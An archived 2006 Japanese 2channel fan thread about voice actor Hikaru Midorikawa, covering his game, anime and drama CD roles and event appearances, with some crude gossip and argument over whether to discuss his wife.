2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【アニメ仕事】緑川光Part16【ください】

1 :名無しさん@お腹いっぱい。:2006/11/30(木) 00:42:41 ID:SCuXAVVp0
ゲーム業界界・BL・そして最近はBS放送の王子様でもある緑川氏ですが
BAPE以外の服も見たい今日この頃

※アンチスレ発祥ですが、近年はファンとアンチのマターリ共存スレです
※過去スレほかは>>2-3あたり

【前スレ】
【美声の】緑川光 Part15【ゲーム廃人】
http://anime.2ch.net/test/read.cgi/voiceactor/1152810316/l50

【過去スレ】
ガス欠か!?緑川光
http://yasai.2ch.net/voice/kako/971/971869177.html
緑川光ニャ。何かあるナリ?
http://yasai.2ch.net/voice/kako/980/980124678.html
★緑川光 グリーンリバーライトの伝説★
http://yasai.2ch.net/voice/kako/989/989313925.html
緑○光ってそんなに人気なの?
http://natto.2ch.net/voice/kako/993/993610175.html
○●○緑川 光バンザーイ!スレッド○●○
http://tv.2ch.net/voice/kako/1009/10092/1009282598.html
〓緑川光 Part.6〓
http://tv.2ch.net/voice/kako/1025/10257/1025793958.html
◆緑川にガカーリだぜ◆  (998) 2: そう思うヤシ
http://tv2.2ch.net/test/read.cgi/voice/1042368486/
デヴ◆緑川にガカーリだぜ◆ヲトメ3 そう思うヤシ
http://comic3.2ch.net/test/read.cgi/voice/1048599403/
やっぱり◆緑川にガカーリだぜ Part9◆ヤセロ
http://comic3.2ch.net/test/read.cgi/voice/1064901921/
ネトゲ◆緑川にガカーリだぜ Part10◆ヤメレ
http://comic5.2ch.net/test/read.cgi/voice/1082048846/
エロゲ◆緑川にガカーリだぜ Part11◆ホモゲ
http://comic5.2ch.net/test/read.cgi/voice/1094743885/
【喘ぎで】緑川光にガカーリだぜ!12【誤魔化せ!】
http://anime.2ch.net/test/read.cgi/voice/1108008657/
【日記更新】緑川にガカーリだぜ Part13【ヤレバデキル】
http://anime.2ch.net/test/read.cgi/voiceactor/1125108043/
【乙女回路】緑川光にガカーリだぜ Part14【搭載】


2 :名無しさん@お腹いっぱい。:2006/11/30(木) 00:43:59 ID:SCuXAVVp0
http://anime.2ch.net/test/read.cgi/voiceactor/1141837892/
過去ログ保管庫
http://greenriverlight.hp.infoseek.co.jp/index.html

嫁って誰、と質問する前に
http://greenriverlight.hp.infoseek.co.jp/supplement.html

過去の主なアニメ出演歴 とりあえず事務所公式見てみましょう
ttp://www.aoni.co.jp/talent/0616123.html

緑川 光(みどりかわ ひかる、1968年5月2日 - )は男性声優。青二プロダクション所属。
栃木県大田原市出身。血液型はB型。
緑川光公式サイト
http://www2.g-7.ne.jp/〜hikaru/

3 :名無しさん@お腹いっぱい。:2006/11/30(木) 01:58:23 ID:NbsE4FK70
[瞳子]伊藤姉妹のスレ?[硝子]
http://anime.2ch.net/test/read.cgi/voice/1156500812/

エロゲ声優の「伊藤姉妹」(瞳子・硝子)のスレです。
アンチ、緑川でもなんでもかまいなしにどうぞ。


緑川光嫁の伊藤瞳子
http://ja.wikipedia.org/wiki/%E4%BC%8A%E8%97%A4%E7%9E%B3%E5%AD%90

エロゲ声優嫁の公式 姉の方
http://www.prince.ne.jp/~ito/

4 :名無しさん@お腹いっぱい。:2006/11/30(木) 03:39:11 ID:xpbDPb8jO
2げっと

5 :名無しさん@お腹いっぱい。:2006/11/30(木) 03:56:58 ID:UdcnOQRK0
964 :名無しさん@お腹いっぱい。:2006/11/30(木) 03:50:43 ID:gBNI/DaR0
勝手にフライングスレ立てしやがって
立てるなら宣言くらいしろよ、しかも誘導なしかよ
しかもそれに乗っかって嫁サイト直リン貼るヤツはバカもいいとこ
2ゲトもそれできてないし
3人とも100年ROMれ


6 :名無しさん@お腹いっぱい。:2006/11/30(木) 04:46:57 ID:Dd6Jr1dD0
[RO]アンチ緑川光スレ[BL]
http://anime.2ch.net/test/read.cgi/voiceactor/1153115575/

7 :名無しさん@お腹いっぱい。:2006/11/30(木) 20:10:24 ID:j1owg0KZ0
          || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
          || あらしは   。    ∧_∧  いいですね。
          ||   無視!  \ (゚Д゚,,)
          ||________⊂⊂ |
  ∧ ∧    ∧ ∧    ∧ ∧    | ̄ ̄ ̄ ̄|
  (  ∧ ∧ (   ∧ ∧ (  ∧ ∧ |      |
〜(_(  ∧ ∧ __(  ∧ ∧__(   ∧ ∧ ̄ ̄ ̄
  〜(_(  ∧ ∧_(  ∧ ∧_(   ∧ ∧  は〜い、先生。
    〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
      〜(___ノ  〜(___ノ   〜(___ノ

8 :名無しさん@お腹いっぱい。:2006/11/30(木) 20:11:45 ID:j1owg0KZ0
    _______________
   |
   |★★荒らしは放置が一番キライ!★★
   | 荒らしは常に誰かの反応を待っています。
   |
   |●嫁話は荒れる元!スルースキルを身につけましょう!
   |
   |▲放置された荒らしは煽りや自作自演であなたのレスを誘います!
   | ノセられてレスしたらその時点であなたの負け!
   |
   |■反撃は荒らしの滋養にして栄養であり最も喜ぶことです
   | 荒らしにエサを与えないで下さい
   |
   |☆枯死するまで孤独に暴れさせておいて
   | ゴミが溜まったら削除が一番です
   | 削除依頼を地道に出しながら、荒らしがアクセス禁止に
   | なる日を気長に待ちましょう
   |
   |     。
   Λ Λ  /
  (,,゚Д゚)⊃ ジュウヨウ!
〜/U /
 U U  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

9 :名無しさん@お腹いっぱい。:2006/11/30(木) 21:37:55 ID:BVUsKpFn0
みどりんの話しよ〜

10 :名無しさん@お腹いっぱい。:2006/11/30(木) 21:48:58 ID:fVr9a30EO
…なんかアンチスレみたいなスレタイじゃありません?

11 :名無しさん@お腹いっぱい。:2006/11/30(木) 22:06:19 ID:m69WoSup0
そんな事無いよ。
素直にもっとアニメ仕事ほしいじゃん。

12 :名無しさん@お腹いっぱい。:2006/11/30(木) 22:47:35 ID:q9PFGzZV0
ほっしーの方が好きです
男ですけど

13 :名無しさん@お腹いっぱい。:2006/11/30(木) 23:53:44 ID:bebEoKz70
ここでいいのかな?

14 :名無しさん@お腹いっぱい。:2006/11/30(木) 23:55:32 ID:m69WoSup0
ほんとアニメでの活躍度最近地味で悲しい

15 :名無しさん@お腹いっぱい。:2006/12/01(金) 01:06:34 ID:Jyzfe6X20
976 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/11/30(木) 13:53:55 ID:j1owg0KZ0
嫁の件は、アンチはやらせておいてもいいけど、こっちは貼る必要がないと思うんだけど
まあ、そう言っていても貼るバカはでてくるんだろうね
話題禁止とテンプレに入れて、後はスルー必須、かまうのは荒らし認定くらいでいいんじゃないの?

982 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/11/30(木) 17:52:09 ID:j1owg0KZ0
結婚してることは公表しているけど、嫁の方はそうじゃないし、
本人も嫁の名前そのほかは秘密にしている


ほら。嫁の話題ひとつでいくつレスが付くのよ
だからいやなんだ


16 :名無しさん@お腹いっぱい。:2006/12/01(金) 01:09:50 ID:+VqhOR1p0
嫁とかどうでもいいから、緑川に長期アニメレギュラーと、流行の漫画原作のアニメの主役級キャラをよこせよ

17 :名無しさん@お腹いっぱい。:2006/12/01(金) 01:12:23 ID:+VqhOR1p0
緑川にしてほしい仕事

高視聴率長期アニメのレギュラー
人気漫画のアニメ化の主役級キャラ
FF新作のパーティメンバーの声
ジブリ

18 :名無しさん@お腹いっぱい。:2006/12/01(金) 01:38:08 ID:qLEFpzWy0
もう良い年なんだし結婚してても問題ないよ
番組のナレーターでも良いんでテレビでミドリンの声聞きたい
一番はみんなと同じで主役キャラをやって欲しいな

19 :名無しさん@お腹いっぱい。:2006/12/01(金) 02:35:34 ID:ovwmb9dU0
どうでもいいが、sageないか?

20 :名無しさん@お腹いっぱい。:2006/12/01(金) 03:16:17 ID:0VpzbEfA0


かこよすぎな攻めをガンガン

21 :名無しさん@お腹いっぱい。:2006/12/01(金) 03:42:38 ID:f5QDJHQT0
前スレからオバ厨の仕切りたがってる奴がうぜええ

                  / ̄ ̄ ヽ,       _,, -‐- ,,_
        ./ ̄"ヽ     /       ',    ./
     / ̄'',!-、bi |    .{0} /¨`ヽ {0}   /
     ,!-、bヽニ   .',    |  .ヽ._.ノ  |  /¨`ヽ  {0}
    ヽニ,  ,'  /´ \   .|  `ー'′_|  i__,,.ノ
     l´  >、_/    \__,>、,r'''" ̄  |  `ー-
    . l   l /      /〈 ー'      ヽ   |
     l   ノ l .l    / /        l,r‐';"´〉  ,r'",r''"
    l,--、l / l     ,l     /     / 〈 /'-'フ" <
_,r=='  ノ`〉 l   / /    /      l   ヽl/"''''''''"
_,r‐'"  / 〈  l''''''フ´ l    /      ノ   l/ /
‐‐''''フ"  ,r''l_,.ノ/  .(    ./     /   / /
‐<ニ--‐‐''" /   /   /`''ヽ、,_ ノ   / /
_r=ニ>-==‐'フ   /  ,..ノ     >'   ,-ム、'
/;'/`>=`ヽ'  ,r'" >-'"  _,..r―-'´`ヽ /  /
l、/lc'`‐'`l__,.r'",r'"  ,rーl", 、     ヽ'ー''


22 :名無しさん@お腹いっぱい。:2006/12/01(金) 05:15:23 ID:SGU4PwaO0
これで、これでよかったんだろう マリアン? 

ない 全然よくないよ!!
リオン坊ちゃんT−T

23 :名無しさん@お腹いっぱい。:2006/12/01(金) 07:35:06 ID:Yb3o4k730
腐女子の喘ぎがみっともない
嫁ぐらいいたって当然だろ

24 :名無しさん@お腹いっぱい。:2006/12/01(金) 08:04:02 ID:iwIdLfKb0
そういう話じゃないんじゃ…

25 :名無しさん@お腹いっぱい。:2006/12/01(金) 09:25:38 ID:Qh+tX0bK0
嫁の事を声に出して自慢しないでほしいんだが
本人にとってそんなに難しいことなのかね?

26 :名無しさん@お腹いっぱい。:2006/12/01(金) 12:04:59 ID:OgZSkGvz0
CDもじっくり声が聞けて良いんだけど
確かにもっとアニメで声聞きたいね。



27 :名無しさん@お腹いっぱい。:2006/12/01(金) 13:14:48 ID:YardA5PM0
>>25
ベタ惚れだからな

28 :名無しさん@お腹いっぱい。:2006/12/01(金) 14:53:36 ID:F/pI8DRS0
ミドリンも嫁も喘ぎが本職だから
夜の営みはすごい五月蝿そうだよねw

29 :名無しさん@お腹いっぱい。:2006/12/01(金) 19:10:27 ID:bto9acGu0
愛妻家で微笑ましいジャマイカ
今月は素晴らしいほどミドリン豊富な月だ
財布は痛いけど、たくさん聞けて幸せ・・・とりあえずリオンを堪能してくるノシ

30 :名無しさん@お腹いっぱい。:2006/12/01(金) 19:28:00 ID:qLEFpzWy0
声優同士って別れてしまう話をけっこう聞くから、ミドリン達にはずっと仲良くいて欲しいな
そんな自分はTODをプレイ中。リオン生存ルートはやっぱないのかな(´・ω・`)
ゲームオーバーに負けないで頑張る

31 :名無しさん@お腹いっぱい。:2006/12/01(金) 20:44:16 ID:5yuVNM4u0
もっとアニメで緑川の声聞きたいよね・・・

32 :名無しさん@お腹いっぱい。:2006/12/01(金) 20:53:33 ID:RBOZ9qsH0
きょうの健康で今、たすける君喋っていたけど
火傷の手当ての仕方だった
これ前にもやったやつだろうか?

短いんだけど、綺麗な声使っててイイんだよね
もっと回数あるといいだが、最近あまり見ないのが残念

33 :名無しさん@お腹いっぱい。:2006/12/02(土) 02:13:07 ID:qKaIPqeE0
ttp://www.jumpfesta.com/booth7.html
ジャンフェス土日ともジョジョで出ますねえ
となると、まだ告知出てないけどバンダイナムコブースの
テイルズにも可能性あるかも?

34 :名無しさん@お腹いっぱい。:2006/12/02(土) 13:21:56 ID:BfBvutLp0
>>29
んだねー。悪い事してるワケじゃないんだし。
強烈な反発はアンチ喜ばせるだけだから笑って流すが吉。
でもってこちらもリオン堪能中。
心配してたより違和感ないし、ゲーム住人にも好評のようで何より。
チャットも増えててカッコカワイイ演技がいい感じだ。
でもTOD終わったらやるゲームがないよ。ミドリン的に美味しいゲーム教えて。

35 :名無しさん@お腹いっぱい。:2006/12/02(土) 17:17:42 ID:CYynOr380
>>34
戦国無双?
ミドリンの役は光秀さまよ><
すごく格好いー!!

36 :名無しさん@お腹いっぱい。:2006/12/02(土) 19:59:42 ID:BfBvutLp0
無双は(アクション苦手だけど)根性で光秀だけクリアしたなw
そいや戦神や決戦Vでも明智光秀やってんだよねえ。
こっちはプレイしてないがどんなんなんだろう。


37 :名無しさん@お腹いっぱい。:2006/12/02(土) 22:38:20 ID:i/OfL+Q7O
最近スラムダンクの流川でずっと声きいてるわ
あんま喋らんが

38 :名無しさん@お腹いっぱい。:2006/12/03(日) 09:07:42 ID:NVxwB9RW0
携帯乙女ゲームのWEBラジオでパーソナリティだそうです
ttp://otme.jp/pc/radio.html
12/11から配信開始
事務所後輩さん迎えてのトークだと
「刺激をください」の若者から刺激をもらおう
みたいなムードになりそうw

あと12/4刊Cool-B 1月号にロングインタビュー
ttp://www.ohzora.co.jp/sf/cool-b/top/
フラゲできた方、どんな感じの記事だったか教えて

ほんとゲーム業界では八面六臂の活躍なんだがな

39 :名無しさん@お腹いっぱい。:2006/12/04(月) 02:05:42 ID:+kIlgQx+0
パチンコ湘南爆走族の緑川の声どうですか?って書き込みが前あったけど動画あるよ
最後のほうの「オラァ行くぜ!上を狙え〜」辺りが見せ場
http://www.youtube.com/watch?v=5_u-up_JAxw

この動画には映ってない演出だと、他には、ロックンロールが心に染みるってポエムを朗読する奴とか
5連チャンすると恋人の津山さんに告白する漫画が声付きで見れるプレミアがあった
告白のシチュエーションは修学旅行の夜に熱出して泣いてる津山さんに告るって感じでした
ちなみに、「好き・・・」って言おうとする津山さんに対して
「その先は・・・絶対言うなよ・・・」って江口の名言がパチンコ板ではパロられてスレタイになってます

40 :名無しさん@お腹いっぱい。:2006/12/04(月) 11:04:45 ID:ajjzMW+/0
彩雲国深夜再放送今夜からだね。11話から。
2期も4月からスタートとなると1期は地上波でもやるんだろうな。
ドラマCDもちょくちょく出てるし、このアニメだけでもおっかけるの大変。
先月出たドラマCD今更買ったが黒静蘭全開ですごい萌えるw

41 :名無しさん@お腹いっぱい。:2006/12/04(月) 13:10:34 ID:LxidpRHh0
>>40
ありがとう
予約しますた(゚∀゚)

42 :名無しさん@お腹いっぱい。:2006/12/04(月) 23:29:40 ID:gkmK/sdg0
過去ログ勝手に管理人です。
このスレが次スレに落ち着いたようなのでPart15を保管しました。
(まだ若干工事中です)
嫁ダレページを勝手にコラム化してみました。おこがましくてすみません。

>>40 私も萌えますた<ドラマCD

43 :名無しさん@お腹いっぱい。:2006/12/05(火) 11:28:44 ID:CxYkBfud0
黒静蘭良いよね


44 :名無しさん@お腹いっぱい。:2006/12/05(火) 13:09:19 ID:H4zrPNmL0
アニメの方が黒い部分がほとんど出てないから
ドラマCDの黒さが際立って面白いよね。
関智との掛け合いに大笑いしてる
(今TODやってるから余計にw)

45 :名無しさん@お腹いっぱい。:2006/12/05(火) 16:01:45 ID:H4zrPNmL0
夜中録画したビデオ見終わった。14話からだったのね。
前の再放送はこの直前で終わったのかな。
今夜は17話〜20話ね。

>>42

でもってコラムの方も読みました。同意です

46 :名無しさん@お腹いっぱい。:2006/12/06(水) 04:02:23 ID:YrBv3mdu0
>>42
いつも乙です、感謝!
コラム読んだけど自分もあれで良いんじゃないかと思いました

47 :名無しさん@お腹いっぱい。:2006/12/06(水) 04:08:38 ID:3hSY3xI70
みどりんりん

48 :名無しさん@お腹いっぱい。:2006/12/06(水) 06:34:12 ID:NEhPBQpXO
最近…ネット喫茶でガンダムWを視るのが好きです
みどりんの声…ハアハア

49 :名無しさん@お腹いっぱい。:2006/12/06(水) 09:56:59 ID:+/4MorR+0
リオン可愛いな。
息子がプレイしてるのじ〜っと見てるんだが
決め台詞とか思わず声揃えて
「格好いい〜」とか叫んでしまう


50 :名無しさん@お腹いっぱい。:2006/12/06(水) 14:59:18 ID:RxxgbKzo0
子供を洗脳すんなよ

51 :名無しさん@お腹いっぱい。:2006/12/07(木) 02:13:33 ID:3nhoy1Y90
スパロボアニメに今日マサキ出たみたいだ
自分の所は一週遅れだから来週だ楽しみ

52 :名無しさん@お腹いっぱい。:2006/12/07(木) 02:25:33 ID:U53mZgHw0
うは。彩雲国のために犠牲にしてしまった回に、よりによって……
キッズステーションとかで放送してくれないかなー

53 :名無しさん@お腹いっぱい。:2006/12/07(木) 03:21:20 ID:dTDsukTw0
いや、むしろセリフ多そうなのは来週<スパロボ

54 :名無しさん@お腹いっぱい。:2006/12/07(木) 08:12:38 ID:KpzrgJpt0
スパロボアニメはOVAしか見てないけどマサキ優遇されてたw
作画はちょっと…だったけど技出すとことかカッコよかったよ

55 :名無しさん@お腹いっぱい。:2006/12/07(木) 23:30:04 ID:hfUwPNlz0
ペルソナの続編キター!

56 :名無しさん@お腹いっぱい。:2006/12/08(金) 00:54:10 ID:VrB2DRFkO
mixiのミドリンの名前が分からない

57 :名無しさん@お腹いっぱい。:2006/12/08(金) 01:28:46 ID:/vMs1MZh0
ドラマCDだが聖闘士星矢やるんだね

アイオリア 下野紘
カミュ 緑川光
リトス 斎藤千和

58 :名無しさん@お腹いっぱい。:2006/12/08(金) 04:21:43 ID:0tYIZWFw0
>>56ひかるんだとか?漏れもワカンネ
>>57カミュか、イメージに合うなぁ

59 :名無しさん@お腹いっぱい。:2006/12/08(金) 17:45:39 ID:ZjE1bxzx0
ゲームの転生〜に別役ででてるのってガイシュツ?
本役より喋ってるんじゃないかコレ

60 :名無しさん@お腹いっぱい。:2006/12/08(金) 17:56:48 ID:2WAKTG590
>>59
kwsk
前作のキャラとはまた別に演じてるの?

61 :名無しさん@お腹いっぱい。:2006/12/08(金) 20:28:30 ID:MNqckEaT0
今NHK教育でナレーションやってる

62 :名無しさん@お腹いっぱい。:2006/12/08(金) 20:31:32 ID:LAhbm1dI0
間に合わなかったorz

63 :名無しさん@お腹いっぱい。:2006/12/09(土) 01:23:28 ID:XracHnqvO
>>60
やった人の話によると、もう一つはラスボス役らしいよ。
確かめたいけど今はテイルズやるのでいっぱいいっぱいだ。

64 :名無しさん@お腹いっぱい。:2006/12/09(土) 18:15:49 ID:u0fO3L9O0
>>63
d!
自分もリオンの為に2周目中なんで確認できんな…
買う予定なかったけどちょっと考えてみるかな

65 :名無しさん@お腹いっぱい。:2006/12/09(土) 23:00:51 ID:DNqddQo70
リオン好きすぎて、二周目ハイデルベルグ前で止まってる・・・
なんというか、本当にミドリンGJ

66 :名無しさん@お腹いっぱい。:2006/12/10(日) 00:34:28 ID:x1aWH/Oi0
二週目にするとリオン何かあるの?

67 :名無しさん@お腹いっぱい。:2006/12/10(日) 01:16:18 ID:6bF0QIg70
アイテムで「なりきり○○」ってのが手に入るから、
なりきりリオンをどのキャラかに装備させたら
そのキャラがリオンになって、戦闘で最後まで使えるようになる。

ストーリーには何の関わりもないけどね。

68 :名無しさん@お腹いっぱい。:2006/12/10(日) 01:27:11 ID:qAPA7Jn80
ゾンビリオンの演出を楽しみに1周目終了→(゚д゚)
とりあえずリオンに会いたくて2周目開始→第一部最後まで進められない

69 :名無しさん@お腹いっぱい。:2006/12/10(日) 16:17:29 ID:Y+BtIpnZ0
でぇ〜〜〜〜〜ぶぅ〜〜〜〜〜〜
キモイんだお〜〜〜〜〜〜〜〜

70 :名無しさん@お腹いっぱい。:2006/12/10(日) 16:20:08 ID:2RP+hFjL0
>>63
そいや前に日記で
「某ゲームの続編収録、今回は2役」
とあったな。
あの仮面の少年役だろうか・・・

71 :名無しさん@お腹いっぱい。:2006/12/10(日) 16:21:42 ID:XwdtnrQT0
>>66-67
バレ擦れでやれよ

72 :名無しさん@お腹いっぱい。:2006/12/10(日) 20:17:58 ID:SscA8OHm0
転生〜の別役はかなり低い声で演じてる
立場的にもけっこうおいしいし超低音声が好きな人にはいいかもな

73 :名無しさん@お腹いっぱい。:2006/12/10(日) 22:58:22 ID:GZqkDuwp0
『沙耶の唄』っていうPCゲームしてたら
主人公の声が緑川 光だったんで驚いた。
まぁ、名前は別名だったけど。
このゲーム知ってる人いるかぁ?

74 :名無しさん@お腹いっぱい。:2006/12/10(日) 23:08:31 ID:6bF0QIg70
別名なら18禁だろうからスレ違いだな

75 :名無しさん@お腹いっぱい。:2006/12/10(日) 23:15:57 ID:o5cMVLMa0
>>55
kwsk

76 :名無しさん@お腹いっぱい。:2006/12/11(月) 02:15:45 ID:shCrTewo0
>>73
知ってるよ
でもそれ、エロゲだから、そっちの板で語ってください
別名と言うことを考慮して、「よく似た声の人」と言うことでw

77 :名無しさん@お腹いっぱい。:2006/12/11(月) 07:01:10 ID:zT/QkmMW0
エロゲってことは緑川が射精するときの声とか欲情したときの声とかやってくれてるわけ?

78 :名無しさん@お腹いっぱい。:2006/12/11(月) 07:07:23 ID:rQ8DI5m00
だから該当スレに逝けよ

79 :名無しさん@お腹いっぱい。:2006/12/11(月) 12:15:20 ID:0b3jsyUo0
>>75
4月?に続編的なソフトが出るらしい。
詳しい事は不明だけど結構追加要素があるそうな。
真田先輩の甚平姿や中学生位のデザインもあるそうだ。

80 :名無しさん@お腹いっぱい。:2006/12/11(月) 13:01:36 ID:0b3jsyUo0
探したら1個あった
ペル本スレ行けばも少し詳しく分かるはず

ttp://www2.ranobe.com/test/src/up16792.jpg


81 :名無しさん@お腹いっぱい。:2006/12/11(月) 19:47:27 ID:DuV5Ic5oO
>>72
ま じ で す か
薙が少ししかでないってことでスルーしてたよ
キャラの性格にもよるけど、低音ボイス好きだし出番多いなら検討しようかな


82 :名無しさん@お腹いっぱい。:2006/12/12(火) 09:14:16 ID:ATClkffN0
転生は売り上げ2万いかないらしいから
店頭から消えるのも多分早いんじゃないかな。
前作でいい印象ないから自分はスルーするが
買う人は早く買った方がいいかも

83 :名無しさん@お腹いっぱい。:2006/12/12(火) 18:56:26 ID:VoUiducY0
ずっと言いたかったけど、人それぞれだからずっと我慢してたけど、
もう言いたい!ここ見てる事を願って。
「もう少し痩せて欲しい」
みんなゴメン

84 :名無しさん@お腹いっぱい。:2006/12/12(火) 20:31:31 ID:DV+TuvSQO
今は結構痩せたよ
BLCDで悪いけど「恋する暴君2」のアフレコレポの写真見たけど、痩せて格好よくなってた

85 :名無しさん@お腹いっぱい。:2006/12/12(火) 20:43:48 ID:uwiujukI0
子供作れよ

86 :名無しさん@お腹いっぱい。:2006/12/12(火) 20:56:41 ID:rEAYBF2S0
セイントビーストTV放送するのか
どこで放送するんだろ

87 :名無しさん@お腹いっぱい。:2006/12/12(火) 22:11:27 ID:WYtJMvmp0
種無し緑川

88 :名無しさん@お腹いっぱい。:2006/12/12(火) 22:53:44 ID:ATClkffN0
>>84
声に惚れてるから外見はどうでもいい
まあほどほどで

89 :名無しさん@お腹いっぱい。:2006/12/13(水) 00:45:02 ID:BP1MBoOdO
>>79
来年かー
自分は真田くらいの声が丁度良くて好きなんで
セリフもいくつか追加されてるといいなw

90 :名無しさん@お腹いっぱい。:2006/12/13(水) 21:07:19 ID:6SRI6LNw0
緑川ってmixiとゲームやりすぎ

91 :名無しさん@お腹いっぱい。:2006/12/14(木) 02:35:06 ID:36TegIfQ0
スパロボ、一週遅れで初見。か わ い い な … !!
来週の方がしゃべるみたいだし、今からwktkしてる

92 :名無しさん@お腹いっぱい。:2006/12/14(木) 02:50:01 ID:UGvwHliW0
>>83
残念だがこんな所見てる訳がない。
嫁はどうか知らんけどな。

93 :名無しさん@お腹いっぱい。:2006/12/14(木) 05:26:12 ID:cIDO6Q560
こんな所見てるわけがない
とは自分は言えないね。
だってあんなミクシ中毒で、ゲーヲタかつアニヲタなんだから
2ch見てる可能性とか普通に高いと思う。
自分で意図的に見ると気にしちゃうから、見ないようにすることはあるかもだけど。

94 :名無しさん@お腹いっぱい。:2006/12/14(木) 05:36:28 ID:7EmyA3+Q0
実際ここの過去スレが緑川サイトに貼られたことがあったろ

95 :名無しさん@お腹いっぱい。:2006/12/14(木) 08:36:12 ID:MzsfUGIfO
芸の幅がないから飽きやすいんだよな

96 :名無しさん@お腹いっぱい。:2006/12/14(木) 10:55:38 ID:9OBXJkpa0
「結果は変わらん。そう、何度やってもだ」が聞きたくて仕方ない
 
ところでもうすぐジャンフェスだな
出るステージてジョジョのみ?テイルズ出ないのか

97 :名無しさん@お腹いっぱい。:2006/12/14(木) 12:55:19 ID:JBU/qhlb0
それしょっちゅう聞いたけどな

続きやる気がしなくてまだクリアしてないよ・・・

98 :名無しさん@お腹いっぱい。:2006/12/14(木) 15:16:16 ID:iRGP123NO
近所に月光録なかった…
おとなしくテイルズ進めよう


99 :名無しさん@お腹いっぱい。:2006/12/14(木) 15:26:43 ID:JBU/qhlb0
うちの近所には新品と共に中古もかなりあったぞ・・。
実売が1万5千〜2万というのが本当だとすると
ゲームとしては???なんだろうなあ。

私はついついGC版のエターナルアルカディアを見つけたもんで
衝動買いしちゃったよ
戦闘部分しか声ないと思うがテイルズとキャスト被っててついw

100 :名無しさん@お腹いっぱい。:2006/12/15(金) 10:35:41 ID:NZi+c6ROO
新品はともかく中古ももう出回ってるんだw
相変わらず雑誌の紹介とかで見る分には面白そうに感じるんだけど
前作でがっかりして買い控えする人が多かったのかな

戦闘ボイスっていえば
少し前にでたPSPの英雄伝説にも声あててるんだっけ?


101 :名無しさん@お腹いっぱい。:2006/12/15(金) 12:54:10 ID:z38bATST0
豚きりスマソン
安元洋貴さんの昨日の日記の「先生(笑)」って緑川のこと?
安元氏、杉田君と仲いいミタイだからそう思ったのですが。

102 :名無しさん@お腹いっぱい。:2006/12/15(金) 13:16:28 ID:oNSFuphG0
ニュアンス的にぽい気もするがアニメ共演してないから
違うんじゃないのかな。
もう一人の先生の方なんじゃ。誰かは知らんが。

>>100
転生はまあ他にも色々あったから仕方ない気もする。
薙というキャラは一緒にラジオやってた鳥海さんも言ってたみたいに
みどりんがやるタイプの王道なんだけどね

103 :名無しさん@お腹いっぱい。:2006/12/15(金) 19:13:19 ID:EkRxGQWH0
>>102
情報はありがたいんだけど
何処の評論家と突っ込みたくなる口調だ

104 :名無しさん@お腹いっぱい。:2006/12/15(金) 21:16:02 ID:oNSFuphG0
いつもこの口調だがそういう突っ込み受けたのは初めてだ・・

ところで明日のジャンフェス(バンダイブース)行く人はいるのかな?
みどりん来るといいね

105 :名無しさん@お腹いっぱい。:2006/12/16(土) 13:06:01 ID:E10hOULR0
ジャンフェスage

106 :名無しさん@お腹いっぱい。:2006/12/16(土) 13:11:35 ID:YPBPuJmJO
リオン1位
ジューダス7位

おめでとう記念age!!

さあ早くリオンが主人公のTOD3を発表してくれ

107 :名無しさん@お腹いっぱい。:2006/12/16(土) 13:18:27 ID:oUOcMOvD0
報告サンクス

緑川さんは来たの?

108 :名無しさん@お腹いっぱい。:2006/12/16(土) 18:37:15 ID:eRBWswoa0
今日も来たみたいだけど明日も来るらしいよ >テイルズ

それにしてもエミリオおめ

109 :名無しさん@お腹いっぱい。:2006/12/16(土) 19:40:56 ID:ccxdwE/a0
ジャンフェスリオンおめでとうage!!!
マイクがつかないトラブルやモニターでランキングバレトラブル等あったけれど
楽しいステージでしたよ
声優豪華すぎて吹いた


110 :名無しさん@お腹いっぱい。:2006/12/16(土) 19:54:35 ID:zjpRZ6RWO
ジャンフェス来たな
通りすがったらモニターに写ってた

111 :名無しさん@お腹いっぱい。:2006/12/17(日) 03:06:47 ID:XMV1IZ6D0
みんなアニメ仕事欲しいって言ってるようだが
今、銀河鉄道物語で毎週出てないか?

112 :名無しさん@お腹いっぱい。:2006/12/17(日) 04:00:54 ID:VRSkIWtUO
>>111 前レスにも書いてあるけど、人気メジャー漫画が原作のアニメ作品(ジャンプとかジャンプとかジャンプとか)に出せって事でしょ。
デスノはキャスティング協力が青二だから来そうだ…。

113 :名無しさん@お腹いっぱい。:2006/12/17(日) 04:49:22 ID:EOT2EFHc0
>>111
人気長期アニメのレギュラーとか人気メジャー漫画の主役級とか
そういうアニメ仕事してほしい!

114 :名無しさん@お腹いっぱい。:2006/12/17(日) 07:42:57 ID:EvDJhyIq0
人気長期アニメと言われてもぱっと思いつかないなあ。
ジャンプアニメはむしろ叩かれ要素ばっかだし。
現状のまったり状況がいいんだが・・・と思うのは自分がゲーマーだからか?

115 :名無しさん@お腹いっぱい。:2006/12/17(日) 09:32:00 ID:FSEwrOOq0
わがままな奴が多いな

116 :名無しさん@お腹いっぱい。:2006/12/17(日) 11:25:40 ID:LSoyiHWh0
>>113 そういうのはギャラの安い若手に回せばいいんじゃね
5年前、アニメレギュラーが途絶えたときを思えば
今は色々でてるじゃん。しかもかなり重要なポジションで。

117 :名無しさん@お腹いっぱい。:2006/12/17(日) 11:54:19 ID:XQlPzGyY0
クレしんとかコナンとかポケモンみたいなアニメのレギュラーか
デスノとかNANAとかのだめとかBLEACHとかみたいな漫画の主役級とか
そういう仕事みどりんにしてほしい・・・・!!

118 :名無しさん@お腹いっぱい。:2006/12/17(日) 12:32:01 ID:CZ51yNAE0
話題作には新人声優を使ってその声優を売り込むのが基本なんじゃないの。
この人の声は主役向きではないしね。

119 :名無しさん@お腹いっぱい。:2006/12/17(日) 12:54:59 ID:V1UMuKaH0
みどりんって主役向きじゃないの?
ヒイロとかマサキとか最高じゃん!

120 :名無しさん@お腹いっぱい。:2006/12/17(日) 13:47:45 ID:7LA6EJLG0
彩雲国物語は、このスレ的にはナシなのか・・・

121 :名無しさん@お腹いっぱい。:2006/12/17(日) 13:51:13 ID:bd++oxrx0
アニメにもっと出て欲しいけど、
ゲーム追いかけるだけでいっぱいいっぱいなので
今ぐらいがいいかな…
ゲームじゃ美味しい役多いと思うし。

122 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:46:47 ID:H79Q0vY+O
